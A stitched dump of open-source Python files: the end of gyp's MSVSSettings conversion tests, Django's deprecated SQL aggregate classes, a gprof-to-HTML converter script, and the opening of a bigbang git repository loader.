'PrecompiledHeaderFile': 'a_file_name',
'PrecompiledHeaderOutputFile': 'a_file_name',
'PreprocessKeepComments': 'true',
'PreprocessorDefinitions': 'd1;d2;d3',
'PreprocessSuppressLineNumbers': 'false',
'PreprocessToFile': 'true',
'ProgramDataBaseFileName': 'a_file_name',
'RuntimeLibrary': 'MultiThreaded',
'RuntimeTypeInfo': 'true',
'ShowIncludes': 'true',
'SmallerTypeCheck': 'true',
'StringPooling': 'true',
'StructMemberAlignment': '1Byte',
'SuppressStartupBanner': 'true',
'TreatWarningAsError': 'true',
'TreatWChar_tAsBuiltInType': 'true',
'UndefineAllPreprocessorDefinitions': 'true',
'UndefinePreprocessorDefinitions': 'd1;d2;d3',
'UseFullPaths': 'true',
'WarningLevel': 'Level2',
'WholeProgramOptimization': 'true',
'XMLDocumentationFileName': 'a_file_name'},
'Link': {
'AdditionalDependencies': 'file1;file2;file3',
'AdditionalLibraryDirectories': 'folder1;folder2;folder3',
'AdditionalManifestDependencies': 'file1;file2;file3',
'AdditionalOptions': 'a_string',
'AddModuleNamesToAssembly': 'file1;file2;file3',
'AllowIsolation': 'true',
'AssemblyDebug': '',
'AssemblyLinkResource': 'file1;file2;file3',
'BaseAddress': 'a_string',
'CLRImageType': 'ForceIJWImage',
'CLRThreadAttribute': 'STAThreadingAttribute',
'CLRUnmanagedCodeCheck': 'true',
'DataExecutionPrevention': '',
'DelayLoadDLLs': 'file1;file2;file3',
'DelaySign': 'true',
'Driver': 'Driver',
'EmbedManagedResourceFile': 'file1;file2;file3',
'EnableCOMDATFolding': '',
'EnableUAC': 'true',
'EntryPointSymbol': 'a_string',
'FixedBaseAddress': 'false',
'ForceSymbolReferences': 'file1;file2;file3',
'FunctionOrder': 'a_file_name',
'GenerateDebugInformation': 'true',
'GenerateMapFile': 'true',
'HeapCommitSize': 'a_string',
'HeapReserveSize': 'a_string',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreEmbeddedIDL': 'true',
'IgnoreSpecificDefaultLibraries': 'file1;file2;file3',
'ImportLibrary': 'a_file_name',
'KeyContainer': 'a_file_name',
'KeyFile': 'a_file_name',
'LargeAddressAware': 'true',
'LinkErrorReporting': 'NoErrorReport',
'LinkTimeCodeGeneration': 'PGInstrument',
'ManifestFile': 'a_file_name',
'MapExports': 'true',
'MapFileName': 'a_file_name',
'MergedIDLBaseFileName': 'a_file_name',
'MergeSections': 'a_string',
'MidlCommandFile': 'a_file_name',
'ModuleDefinitionFile': 'a_file_name',
'NoEntryPoint': 'true',
'OptimizeReferences': '',
'OutputFile': 'a_file_name',
'PerUserRedirection': 'true',
'Profile': 'true',
'ProfileGuidedDatabase': 'a_file_name',
'ProgramDatabaseFile': 'a_file_name',
'RandomizedBaseAddress': 'false',
'RegisterOutput': 'true',
'SetChecksum': 'true',
'ShowProgress': 'NotSet',
'StackCommitSize': 'a_string',
'StackReserveSize': 'a_string',
'StripPrivateSymbols': 'a_file_name',
'SubSystem': 'Windows',
'SupportUnloadOfDelayLoadedDLL': 'true',
'SuppressStartupBanner': 'true',
'SwapRunFromCD': 'true',
'SwapRunFromNET': 'true',
'TargetMachine': 'MachineARM',
'TerminalServerAware': 'true',
'TurnOffAssemblyGeneration': 'true',
'TypeLibraryFile': 'a_file_name',
'TypeLibraryResourceID': '33',
'UACExecutionLevel': 'HighestAvailable',
'UACUIAccess': 'true',
'Version': 'a_string'},
'ResourceCompile': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'Culture': '0x03eb',
'IgnoreStandardIncludePath': 'true',
'PreprocessorDefinitions': 'd1;d2;d3',
'ResourceOutputFileName': 'a_string',
'ShowProgress': 'true',
'SuppressStartupBanner': 'true',
'UndefinePreprocessorDefinitions': 'd1;d2;d3'},
'Midl': {
'AdditionalIncludeDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'CPreprocessOptions': 'a_string',
'DefaultCharType': 'Unsigned',
'DllDataFileName': 'a_file_name',
'EnableErrorChecks': 'All',
'ErrorCheckAllocations': 'true',
'ErrorCheckBounds': 'true',
'ErrorCheckEnumRange': 'true',
'ErrorCheckRefPointers': 'true',
'ErrorCheckStubData': 'true',
'GenerateStublessProxies': 'true',
'GenerateTypeLibrary': 'true',
'HeaderFileName': 'a_file_name',
'IgnoreStandardIncludePath': 'true',
'InterfaceIdentifierFileName': 'a_file_name',
'MkTypLibCompatible': 'true',
'OutputDirectory': 'a_string',
'PreprocessorDefinitions': 'd1;d2;d3',
'ProxyFileName': 'a_file_name',
'RedirectOutputAndErrors': 'a_file_name',
'StructMemberAlignment': '4',
'SuppressStartupBanner': 'true',
'TargetEnvironment': 'Win32',
'TypeLibraryName': 'a_file_name',
'UndefinePreprocessorDefinitions': 'd1;d2;d3',
'ValidateAllParameters': 'true',
'WarnAsError': 'true',
'WarningLevel': '4'},
'Lib': {
'AdditionalDependencies': 'file1;file2;file3',
'AdditionalLibraryDirectories': 'folder1;folder2;folder3',
'AdditionalOptions': 'a_string',
'ExportNamedFunctions': 'd1;d2;d3',
'ForceSymbolReferences': 'a_string',
'IgnoreAllDefaultLibraries': 'true',
'IgnoreSpecificDefaultLibraries': 'file1;file2;file3',
'ModuleDefinitionFile': 'a_file_name',
'OutputFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'UseUnicodeResponseFiles': 'true'},
'Manifest': {
'AdditionalManifestFiles': 'file1;file2;file3',
'AdditionalOptions': 'a_string',
'AssemblyIdentity': 'a_string',
'ComponentFileName': 'a_file_name',
'GenerateCatalogFiles': 'true',
'InputResourceManifests': 'a_string',
'OutputManifestFile': 'a_file_name',
'RegistrarScriptFile': 'a_file_name',
'ReplacementsFile': 'a_file_name',
'SuppressStartupBanner': 'true',
'TypeLibraryFile': 'a_file_name',
'UpdateFileHashes': 'true',
'UpdateFileHashesSearchPath': 'a_file_name',
'VerboseOutput': 'true'},
'ManifestResourceCompile': {
'ResourceOutputFileName': 'my_name'},
'ProjectReference': {
'LinkLibraryDependencies': 'true',
'UseLibraryDependencyInputs': 'false'},
'': {
'EmbedManifest': 'true',
'GenerateManifest': 'true',
'IgnoreImportLibrary': 'true',
'LinkIncremental': 'false'}}
actual_msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(
msvs_settings,
self.stderr)
self.assertEqual(expected_msbuild_settings, actual_msbuild_settings)
self._ExpectedWarnings([])
  def testConvertToMSBuildSettings_actual(self):
    """Tests the conversion of an actual project.
    A VS2008 project with most of the options defined was created through the
    VS2008 IDE. It was then converted to VS2010. The tool settings found in
    the .vcproj and .vcxproj files were converted to the two dictionaries
    msvs_settings and expected_msbuild_settings.
    Note that for many settings, the VS2010 converter adds macros like
    %(AdditionalIncludeDirectories) to make sure than inherited values are
    included. Since the Gyp projects we generate do not use inheritance,
    we removed these macros. They were:
        ClCompile:
            AdditionalIncludeDirectories: ';%(AdditionalIncludeDirectories)'
            AdditionalOptions: ' %(AdditionalOptions)'
            AdditionalUsingDirectories: ';%(AdditionalUsingDirectories)'
            DisableSpecificWarnings: ';%(DisableSpecificWarnings)',
            ForcedIncludeFiles: ';%(ForcedIncludeFiles)',
            ForcedUsingFiles: ';%(ForcedUsingFiles)',
            PreprocessorDefinitions: ';%(PreprocessorDefinitions)',
            UndefinePreprocessorDefinitions:
                ';%(UndefinePreprocessorDefinitions)',
        Link:
            AdditionalDependencies: ';%(AdditionalDependencies)',
            AdditionalLibraryDirectories: ';%(AdditionalLibraryDirectories)',
            AdditionalManifestDependencies:
                ';%(AdditionalManifestDependencies)',
            AdditionalOptions: ' %(AdditionalOptions)',
            AddModuleNamesToAssembly: ';%(AddModuleNamesToAssembly)',
            AssemblyLinkResource: ';%(AssemblyLinkResource)',
            DelayLoadDLLs: ';%(DelayLoadDLLs)',
            EmbedManagedResourceFile: ';%(EmbedManagedResourceFile)',
            ForceSymbolReferences: ';%(ForceSymbolReferences)',
            IgnoreSpecificDefaultLibraries:
                ';%(IgnoreSpecificDefaultLibraries)',
        ResourceCompile:
            AdditionalIncludeDirectories: ';%(AdditionalIncludeDirectories)',
            AdditionalOptions: ' %(AdditionalOptions)',
            PreprocessorDefinitions: ';%(PreprocessorDefinitions)',
        Manifest:
            AdditionalManifestFiles: ';%(AdditionalManifestFiles)',
            AdditionalOptions: ' %(AdditionalOptions)',
            InputResourceManifests: ';%(InputResourceManifests)',
    """
    # Input fixture: tool settings exactly as found in the VS2008 .vcproj.
    msvs_settings = {
        'VCCLCompilerTool': {
            'AdditionalIncludeDirectories': 'dir1',
            'AdditionalOptions': '/more',
            'AdditionalUsingDirectories': 'test',
            'AssemblerListingLocation': '$(IntDir)\\a',
            'AssemblerOutput': '1',
            'BasicRuntimeChecks': '3',
            'BrowseInformation': '1',
            'BrowseInformationFile': '$(IntDir)\\e',
            'BufferSecurityCheck': 'false',
            'CallingConvention': '1',
            'CompileAs': '1',
            'DebugInformationFormat': '4',
            'DefaultCharIsUnsigned': 'true',
            'Detect64BitPortabilityProblems': 'true',
            'DisableLanguageExtensions': 'true',
            'DisableSpecificWarnings': 'abc',
            'EnableEnhancedInstructionSet': '1',
            'EnableFiberSafeOptimizations': 'true',
            'EnableFunctionLevelLinking': 'true',
            'EnableIntrinsicFunctions': 'true',
            'EnablePREfast': 'true',
            'ErrorReporting': '2',
            'ExceptionHandling': '2',
            'ExpandAttributedSource': 'true',
            'FavorSizeOrSpeed': '2',
            'FloatingPointExceptions': 'true',
            'FloatingPointModel': '1',
            'ForceConformanceInForLoopScope': 'false',
            'ForcedIncludeFiles': 'def',
            'ForcedUsingFiles': 'ge',
            'GeneratePreprocessedFile': '2',
            'GenerateXMLDocumentationFiles': 'true',
            'IgnoreStandardIncludePath': 'true',
            'InlineFunctionExpansion': '1',
            'KeepComments': 'true',
            'MinimalRebuild': 'true',
            'ObjectFile': '$(IntDir)\\b',
            'OmitDefaultLibName': 'true',
            'OmitFramePointers': 'true',
            'OpenMP': 'true',
            'Optimization': '3',
            'PrecompiledHeaderFile': '$(IntDir)\\$(TargetName).pche',
            'PrecompiledHeaderThrough': 'StdAfx.hd',
            'PreprocessorDefinitions': 'WIN32;_DEBUG;_CONSOLE',
            'ProgramDataBaseFileName': '$(IntDir)\\vc90b.pdb',
            'RuntimeLibrary': '3',
            'RuntimeTypeInfo': 'false',
            'ShowIncludes': 'true',
            'SmallerTypeCheck': 'true',
            'StringPooling': 'true',
            'StructMemberAlignment': '3',
            'SuppressStartupBanner': 'false',
            'TreatWChar_tAsBuiltInType': 'false',
            'UndefineAllPreprocessorDefinitions': 'true',
            'UndefinePreprocessorDefinitions': 'wer',
            'UseFullPaths': 'true',
            'UsePrecompiledHeader': '0',
            'UseUnicodeResponseFiles': 'false',
            'WarnAsError': 'true',
            'WarningLevel': '3',
            'WholeProgramOptimization': 'true',
            'XMLDocumentationFileName': '$(IntDir)\\c'},
        'VCLinkerTool': {
            'AdditionalDependencies': 'zx',
            'AdditionalLibraryDirectories': 'asd',
            'AdditionalManifestDependencies': 's2',
            'AdditionalOptions': '/mor2',
            'AddModuleNamesToAssembly': 'd1',
            'AllowIsolation': 'false',
            'AssemblyDebug': '1',
            'AssemblyLinkResource': 'd5',
            'BaseAddress': '23423',
            'CLRImageType': '3',
            'CLRThreadAttribute': '1',
            'CLRUnmanagedCodeCheck': 'true',
            'DataExecutionPrevention': '0',
            'DelayLoadDLLs': 'd4',
            'DelaySign': 'true',
            'Driver': '2',
            'EmbedManagedResourceFile': 'd2',
            'EnableCOMDATFolding': '1',
            'EnableUAC': 'false',
            'EntryPointSymbol': 'f5',
            'ErrorReporting': '2',
            'FixedBaseAddress': '1',
            'ForceSymbolReferences': 'd3',
            'FunctionOrder': 'fssdfsd',
            'GenerateDebugInformation': 'true',
            'GenerateManifest': 'false',
            'GenerateMapFile': 'true',
            'HeapCommitSize': '13',
            'HeapReserveSize': '12',
            'IgnoreAllDefaultLibraries': 'true',
            'IgnoreDefaultLibraryNames': 'flob;flok',
            'IgnoreEmbeddedIDL': 'true',
            'IgnoreImportLibrary': 'true',
            'ImportLibrary': 'f4',
            'KeyContainer': 'f7',
            'KeyFile': 'f6',
            'LargeAddressAware': '2',
            'LinkIncremental': '0',
            'LinkLibraryDependencies': 'false',
            'LinkTimeCodeGeneration': '1',
            'ManifestFile':
                '$(IntDir)\\$(TargetFileName).2intermediate.manifest',
            'MapExports': 'true',
            'MapFileName': 'd5',
            'MergedIDLBaseFileName': 'f2',
            'MergeSections': 'f5',
            'MidlCommandFile': 'f1',
            'ModuleDefinitionFile': 'sdsd',
            'OptimizeForWindows98': '2',
            'OptimizeReferences': '2',
            'OutputFile': '$(OutDir)\\$(ProjectName)2.exe',
            'PerUserRedirection': 'true',
            'Profile': 'true',
            'ProfileGuidedDatabase': '$(TargetDir)$(TargetName).pgdd',
            'ProgramDatabaseFile': 'Flob.pdb',
            'RandomizedBaseAddress': '1',
            'RegisterOutput': 'true',
            'ResourceOnlyDLL': 'true',
            'SetChecksum': 'false',
            'ShowProgress': '1',
            'StackCommitSize': '15',
            'StackReserveSize': '14',
            'StripPrivateSymbols': 'd3',
            'SubSystem': '1',
            'SupportUnloadOfDelayLoadedDLL': 'true',
            'SuppressStartupBanner': 'false',
            'SwapRunFromCD': 'true',
            'SwapRunFromNet': 'true',
            'TargetMachine': '1',
            'TerminalServerAware': '1',
            'TurnOffAssemblyGeneration': 'true',
            'TypeLibraryFile': 'f3',
            'TypeLibraryResourceID': '12',
            'UACExecutionLevel': '2',
            'UACUIAccess': 'true',
            'UseLibraryDependencyInputs': 'true',
            'UseUnicodeResponseFiles': 'false',
            'Version': '333'},
        'VCResourceCompilerTool': {
            'AdditionalIncludeDirectories': 'f3',
            'AdditionalOptions': '/more3',
            'Culture': '3084',
            'IgnoreStandardIncludePath': 'true',
            'PreprocessorDefinitions': '_UNICODE;UNICODE2',
            'ResourceOutputFileName': '$(IntDir)/$(InputName)3.res',
            'ShowProgress': 'true'},
        'VCManifestTool': {
            'AdditionalManifestFiles': 'sfsdfsd',
            'AdditionalOptions': 'afdsdafsd',
            'AssemblyIdentity': 'sddfdsadfsa',
            'ComponentFileName': 'fsdfds',
            'DependencyInformationFile': '$(IntDir)\\mt.depdfd',
            'EmbedManifest': 'false',
            'GenerateCatalogFiles': 'true',
            'InputResourceManifests': 'asfsfdafs',
            'ManifestResourceFile':
                '$(IntDir)\\$(TargetFileName).embed.manifest.resfdsf',
            'OutputManifestFile': '$(TargetPath).manifestdfs',
            'RegistrarScriptFile': 'sdfsfd',
            'ReplacementsFile': 'sdffsd',
            'SuppressStartupBanner': 'false',
            'TypeLibraryFile': 'sfsd',
            'UpdateFileHashes': 'true',
            'UpdateFileHashesSearchPath': 'sfsd',
            'UseFAT32Workaround': 'true',
            'UseUnicodeResponseFiles': 'false',
            'VerboseOutput': 'true'}}
    # Expected output: the equivalent VS2010 (.vcxproj/MSBuild) settings, as
    # produced by the VS2010 upgrade wizard (minus inheritance macros; see
    # the docstring above).
    expected_msbuild_settings = {
        'ClCompile': {
            'AdditionalIncludeDirectories': 'dir1',
            'AdditionalOptions': '/more /J',
            'AdditionalUsingDirectories': 'test',
            'AssemblerListingLocation': '$(IntDir)a',
            'AssemblerOutput': 'AssemblyCode',
            'BasicRuntimeChecks': 'EnableFastChecks',
            'BrowseInformation': 'true',
            'BrowseInformationFile': '$(IntDir)e',
            'BufferSecurityCheck': 'false',
            'CallingConvention': 'FastCall',
            'CompileAs': 'CompileAsC',
            'DebugInformationFormat': 'EditAndContinue',
            'DisableLanguageExtensions': 'true',
            'DisableSpecificWarnings': 'abc',
            'EnableEnhancedInstructionSet': 'StreamingSIMDExtensions',
            'EnableFiberSafeOptimizations': 'true',
            'EnablePREfast': 'true',
            'ErrorReporting': 'Queue',
            'ExceptionHandling': 'Async',
            'ExpandAttributedSource': 'true',
            'FavorSizeOrSpeed': 'Size',
            'FloatingPointExceptions': 'true',
            'FloatingPointModel': 'Strict',
            'ForceConformanceInForLoopScope': 'false',
            'ForcedIncludeFiles': 'def',
            'ForcedUsingFiles': 'ge',
            'FunctionLevelLinking': 'true',
            'GenerateXMLDocumentationFiles': 'true',
            'IgnoreStandardIncludePath': 'true',
            'InlineFunctionExpansion': 'OnlyExplicitInline',
            'IntrinsicFunctions': 'true',
            'MinimalRebuild': 'true',
            'ObjectFileName': '$(IntDir)b',
            'OmitDefaultLibName': 'true',
            'OmitFramePointers': 'true',
            'OpenMPSupport': 'true',
            'Optimization': 'Full',
            'PrecompiledHeader': 'NotUsing', # Actual conversion gives ''
            'PrecompiledHeaderFile': 'StdAfx.hd',
            'PrecompiledHeaderOutputFile': '$(IntDir)$(TargetName).pche',
            'PreprocessKeepComments': 'true',
            'PreprocessorDefinitions': 'WIN32;_DEBUG;_CONSOLE',
            'PreprocessSuppressLineNumbers': 'true',
            'PreprocessToFile': 'true',
            'ProgramDataBaseFileName': '$(IntDir)vc90b.pdb',
            'RuntimeLibrary': 'MultiThreadedDebugDLL',
            'RuntimeTypeInfo': 'false',
            'ShowIncludes': 'true',
            'SmallerTypeCheck': 'true',
            'StringPooling': 'true',
            'StructMemberAlignment': '4Bytes',
            'SuppressStartupBanner': 'false',
            'TreatWarningAsError': 'true',
            'TreatWChar_tAsBuiltInType': 'false',
            'UndefineAllPreprocessorDefinitions': 'true',
            'UndefinePreprocessorDefinitions': 'wer',
            'UseFullPaths': 'true',
            'WarningLevel': 'Level3',
            'WholeProgramOptimization': 'true',
            'XMLDocumentationFileName': '$(IntDir)c'},
        'Link': {
            'AdditionalDependencies': 'zx',
            'AdditionalLibraryDirectories': 'asd',
            'AdditionalManifestDependencies': 's2',
            'AdditionalOptions': '/mor2',
            'AddModuleNamesToAssembly': 'd1',
            'AllowIsolation': 'false',
            'AssemblyDebug': 'true',
            'AssemblyLinkResource': 'd5',
            'BaseAddress': '23423',
            'CLRImageType': 'ForceSafeILImage',
            'CLRThreadAttribute': 'MTAThreadingAttribute',
            'CLRUnmanagedCodeCheck': 'true',
            'DataExecutionPrevention': '',
            'DelayLoadDLLs': 'd4',
            'DelaySign': 'true',
            'Driver': 'UpOnly',
            'EmbedManagedResourceFile': 'd2',
            'EnableCOMDATFolding': 'false',
            'EnableUAC': 'false',
            'EntryPointSymbol': 'f5',
            'FixedBaseAddress': 'false',
            'ForceSymbolReferences': 'd3',
            'FunctionOrder': 'fssdfsd',
            'GenerateDebugInformation': 'true',
            'GenerateMapFile': 'true',
            'HeapCommitSize': '13',
            'HeapReserveSize': '12',
            'IgnoreAllDefaultLibraries': 'true',
            'IgnoreEmbeddedIDL': 'true',
            'IgnoreSpecificDefaultLibraries': 'flob;flok',
            'ImportLibrary': 'f4',
            'KeyContainer': 'f7',
            'KeyFile': 'f6',
            'LargeAddressAware': 'true',
            'LinkErrorReporting': 'QueueForNextLogin',
            'LinkTimeCodeGeneration': 'UseLinkTimeCodeGeneration',
            'ManifestFile': '$(IntDir)$(TargetFileName).2intermediate.manifest',
            'MapExports': 'true',
            'MapFileName': 'd5',
            'MergedIDLBaseFileName': 'f2',
            'MergeSections': 'f5',
            'MidlCommandFile': 'f1',
            'ModuleDefinitionFile': 'sdsd',
            'NoEntryPoint': 'true',
            'OptimizeReferences': 'true',
            'OutputFile': '$(OutDir)$(ProjectName)2.exe',
            'PerUserRedirection': 'true',
            'Profile': 'true',
            'ProfileGuidedDatabase': '$(TargetDir)$(TargetName).pgdd',
            'ProgramDatabaseFile': 'Flob.pdb',
            'RandomizedBaseAddress': 'false',
            'RegisterOutput': 'true',
            'SetChecksum': 'false',
            'ShowProgress': 'LinkVerbose',
            'StackCommitSize': '15',
            'StackReserveSize': '14',
            'StripPrivateSymbols': 'd3',
            'SubSystem': 'Console',
            'SupportUnloadOfDelayLoadedDLL': 'true',
            'SuppressStartupBanner': 'false',
            'SwapRunFromCD': 'true',
            'SwapRunFromNET': 'true',
            'TargetMachine': 'MachineX86',
            'TerminalServerAware': 'false',
            'TurnOffAssemblyGeneration': 'true',
            'TypeLibraryFile': 'f3',
            'TypeLibraryResourceID': '12',
            'UACExecutionLevel': 'RequireAdministrator',
            'UACUIAccess': 'true',
            'Version': '333'},
        'ResourceCompile': {
            'AdditionalIncludeDirectories': 'f3',
            'AdditionalOptions': '/more3',
            'Culture': '0x0c0c',
            'IgnoreStandardIncludePath': 'true',
            'PreprocessorDefinitions': '_UNICODE;UNICODE2',
            'ResourceOutputFileName': '$(IntDir)%(Filename)3.res',
            'ShowProgress': 'true'},
        'Manifest': {
            'AdditionalManifestFiles': 'sfsdfsd',
            'AdditionalOptions': 'afdsdafsd',
            'AssemblyIdentity': 'sddfdsadfsa',
            'ComponentFileName': 'fsdfds',
            'GenerateCatalogFiles': 'true',
            'InputResourceManifests': 'asfsfdafs',
            'OutputManifestFile': '$(TargetPath).manifestdfs',
            'RegistrarScriptFile': 'sdfsfd',
            'ReplacementsFile': 'sdffsd',
            'SuppressStartupBanner': 'false',
            'TypeLibraryFile': 'sfsd',
            'UpdateFileHashes': 'true',
            'UpdateFileHashesSearchPath': 'sfsd',
            'VerboseOutput': 'true'},
        'ProjectReference': {
            'LinkLibraryDependencies': 'false',
            'UseLibraryDependencyInputs': 'true'},
        '': {
            'EmbedManifest': 'false',
            'GenerateManifest': 'false',
            'IgnoreImportLibrary': 'true',
            'LinkIncremental': ''
        },
        'ManifestResourceCompile': {
            'ResourceOutputFileName':
                '$(IntDir)$(TargetFileName).embed.manifest.resfdsf'}
    }
    # Convert and verify; a clean conversion must also emit no warnings.
    actual_msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(
        msvs_settings,
        self.stderr)
    self.assertEqual(expected_msbuild_settings, actual_msbuild_settings)
    self._ExpectedWarnings([])
if __name__ == '__main__':
  unittest.main()  # Run the MSVSSettings conversion tests when executed directly.
| mit |
jenalgit/django | django/db/models/sql/aggregates.py | 174 | 4843 | """
Classes to represent the default SQL aggregate functions
"""
import copy
import warnings
from django.db.models.fields import FloatField, IntegerField
from django.db.models.lookups import RegisterLookupMixin
from django.utils.deprecation import RemovedInDjango110Warning
from django.utils.functional import cached_property
__all__ = ['Aggregate', 'Avg', 'Count', 'Max', 'Min', 'StdDev', 'Sum', 'Variance']
warnings.warn(
"django.db.models.sql.aggregates is deprecated. Use "
"django.db.models.aggregates instead.",
RemovedInDjango110Warning, stacklevel=2)
class Aggregate(RegisterLookupMixin):
    """
    Default SQL Aggregate.
    """
    # is_ordinal: output is always an integer (e.g. COUNT).
    # is_computed: output is always a computed float (e.g. AVG).
    is_ordinal = False
    is_computed = False
    sql_template = '%(function)s(%(field)s)'
    def __init__(self, col, source=None, is_summary=False, **extra):
        """Instantiate an SQL aggregate
        * col is a column reference describing the subject field
          of the aggregate. It can be an alias, or a tuple describing
          a table and column name.
        * source is the underlying field or aggregate definition for
          the column reference. If the aggregate is not an ordinal or
          computed type, this reference is used to determine the coerced
          output type of the aggregate.
        * extra is a dictionary of additional data to provide for the
          aggregate definition
        Also utilizes the class variables:
        * sql_function, the name of the SQL function that implements the
          aggregate.
        * sql_template, a template string that is used to render the
          aggregate into SQL.
        * is_ordinal, a boolean indicating if the output of this aggregate
          is an integer (e.g., a count)
        * is_computed, a boolean indicating if this output of this aggregate
          is a computed float (e.g., an average), regardless of the input
          type.
        """
        self.col = col
        self.source = source
        self.is_summary = is_summary
        self.extra = extra
        # Follow the chain of aggregate sources back until you find an
        # actual field, or an aggregate that forces a particular output
        # type. This type of this field will be used to coerce values
        # retrieved from the database.
        tmp = self
        while tmp and isinstance(tmp, Aggregate):
            if getattr(tmp, 'is_ordinal', False):
                tmp = self._ordinal_aggregate_field
            elif getattr(tmp, 'is_computed', False):
                tmp = self._computed_aggregate_field
            else:
                tmp = tmp.source
        self.field = tmp
    # Two fake fields used to identify aggregate types in data-conversion operations.
    @cached_property
    def _ordinal_aggregate_field(self):
        return IntegerField()
    @cached_property
    def _computed_aggregate_field(self):
        return FloatField()
    def relabeled_clone(self, change_map):
        # Shallow copy; when col is an (alias, column) pair, re-point the
        # table alias through change_map.
        clone = copy.copy(self)
        if isinstance(self.col, (list, tuple)):
            clone.col = (change_map.get(self.col[0], self.col[0]), self.col[1])
        return clone
    def as_sql(self, compiler, connection):
        "Return the aggregate, rendered as SQL with parameters."
        params = []
        if hasattr(self.col, 'as_sql'):
            field_name, params = self.col.as_sql(compiler, connection)
        elif isinstance(self.col, (list, tuple)):
            # NOTE(review): ``compiler`` is invoked as a callable here
            # (legacy quote-name behavior) -- confirm against callers.
            field_name = '.'.join(compiler(c) for c in self.col)
        else:
            field_name = compiler(self.col)
        substitutions = {
            'function': self.sql_function,
            'field': field_name
        }
        substitutions.update(self.extra)
        return self.sql_template % substitutions, params
    def get_group_by_cols(self):
        # Aggregates never contribute GROUP BY columns themselves.
        return []
    @property
    def output_field(self):
        return self.field
class Avg(Aggregate):
    # AVG coerces its output to float regardless of the input field type.
    is_computed = True
    sql_function = 'AVG'
class Count(Aggregate):
    """COUNT aggregate: integral output, with optional DISTINCT."""
    is_ordinal = True
    sql_function = 'COUNT'
    sql_template = '%(function)s(%(distinct)s%(field)s)'

    def __init__(self, col, distinct=False, **extra):
        # The template substitutes 'distinct' directly, so it is either the
        # literal 'DISTINCT ' prefix or the empty string.
        if distinct:
            distinct_prefix = 'DISTINCT '
        else:
            distinct_prefix = ''
        super(Count, self).__init__(col, distinct=distinct_prefix, **extra)
class Max(Aggregate):
    # Output type follows the source field (neither ordinal nor computed).
    sql_function = 'MAX'
class Min(Aggregate):
    # Output type follows the source field (neither ordinal nor computed).
    sql_function = 'MIN'
class StdDev(Aggregate):
    """Standard-deviation aggregate; float output, sample or population."""
    is_computed = True

    def __init__(self, col, sample=False, **extra):
        super(StdDev, self).__init__(col, **extra)
        # Sample vs. population picks the SQL function at instance level.
        if sample:
            self.sql_function = 'STDDEV_SAMP'
        else:
            self.sql_function = 'STDDEV_POP'
class Sum(Aggregate):
    # Output type follows the source field (neither ordinal nor computed).
    sql_function = 'SUM'
class Variance(Aggregate):
    """Variance aggregate; float output, sample or population."""
    is_computed = True

    def __init__(self, col, sample=False, **extra):
        super(Variance, self).__init__(col, **extra)
        # Sample vs. population picks the SQL function at instance level.
        if sample:
            self.sql_function = 'VAR_SAMP'
        else:
            self.sql_function = 'VAR_POP'
| bsd-3-clause |
mujiansu/arangodb | 3rdParty/V8-4.3.61/third_party/python_26/Tools/scripts/gprof2html.py | 64 | 2171 | #! /usr/bin/env python2.3
"""Transform gprof(1) output into useful HTML."""
import re, os, sys, cgi, webbrowser
header = """\
<html>
<head>
<title>gprof output (%s)</title>
</head>
<body>
<pre>
"""
trailer = """\
</pre>
</body>
</html>
"""
def add_escapes(input):
    """Yield each line of *input* with HTML special characters escaped.

    Portability fix: cgi.escape was removed in Python 3.8 (and the cgi
    module itself in 3.13). Use html.escape when available, falling back
    to cgi.escape on Python 2. quote=False preserves the historical
    cgi.escape default of leaving quote characters untouched.
    """
    try:
        from html import escape as _escape
    except ImportError:  # Python 2: the html module has no escape()
        from cgi import escape as _escape
    for line in input:
        yield _escape(line, False)
def main():
    """Convert gprof output (gprof.out, or argv[1]) to cross-linked HTML.

    Writes <input>.html next to the input file and opens it in a browser.
    NOTE(review): uses the Python 2 ``file()`` builtin -- py2-only script.
    """
    filename = "gprof.out"
    if sys.argv[1:]:
        filename = sys.argv[1]
    outputfilename = filename + ".html"
    input = add_escapes(file(filename))
    output = file(outputfilename, "w")
    output.write(header % filename)
    # Copy the preamble through to the flat-profile column header row.
    for line in input:
        output.write(line)
        if line.startswith(" time"):
            break
    labels = {}
    # Flat profile: the last word of each row is a function name; anchor it
    # and link it to the corresponding call-graph entry.
    for line in input:
        m = re.match(r"(.* )(\w+)\n", line)
        if not m:
            output.write(line)
            break
        stuff, fname = m.group(1, 2)
        labels[fname] = fname
        output.write('%s<a name="flat:%s" href="#call:%s">%s</a>\n' %
                     (stuff, fname, fname, fname))
    # Copy everything up to the call-graph column header row.
    for line in input:
        output.write(line)
        if line.startswith("index % time"):
            break
    # Call graph: "[n]" rows get anchors pointing back to the flat profile;
    # other rows linking a known function get a plain link.
    for line in input:
        m = re.match(r"(.* )(\w+)(( <cycle.*>)? \[\d+\])\n", line)
        if not m:
            output.write(line)
            if line.startswith("Index by function name"):
                break
            continue
        prefix, fname, suffix = m.group(1, 2, 3)
        if fname not in labels:
            output.write(line)
            continue
        if line.startswith("["):
            output.write('%s<a name="call:%s" href="#flat:%s">%s</a>%s\n' %
                         (prefix, fname, fname, fname, suffix))
        else:
            output.write('%s<a href="#call:%s">%s</a>%s\n' %
                         (prefix, fname, fname, suffix))
    # Function index: hyperlink every word that matches a known function.
    for line in input:
        for part in re.findall(r"(\w+(?:\.c)?|\W+)", line):
            if part in labels:
                part = '<a href="#call:%s">%s</a>' % (part, part)
            output.write(part)
    output.write(trailer)
    output.close()
    webbrowser.open("file:" + os.path.abspath(outputfilename))
if __name__ == '__main__':
    main()  # CLI entry point: gprof2html.py [gprof-output-file]
| apache-2.0 |
Aryan-Barbarian/bigbang | bigbang/repo_loader.py | 3 | 7776 | from git_repo import GitRepo, MultiGitRepo
import json;
import os;
import re;
import subprocess;
import sys;
import pandas as pd
import requests
import fnmatch
from IPython.nbformat import current as nbformat
from IPython.nbconvert import PythonExporter
import networkx as nx
import compiler
from compiler.ast import From
from compiler.ast import Import
from config.config import CONFIG
repoLocation = CONFIG.repo_path
examplesLocation = CONFIG.urls_path
nameRegex = re.compile('([^/]*)(\\.git$)')
fileRegex = re.compile('.*\/(.*)')
def repo_already_exists(filepath):
    """Return True when something already exists at *filepath*."""
    return os.path.exists(filepath)
"""
Converts a github url (e.g. https://github.com/sbenthall/bigbang.git) to
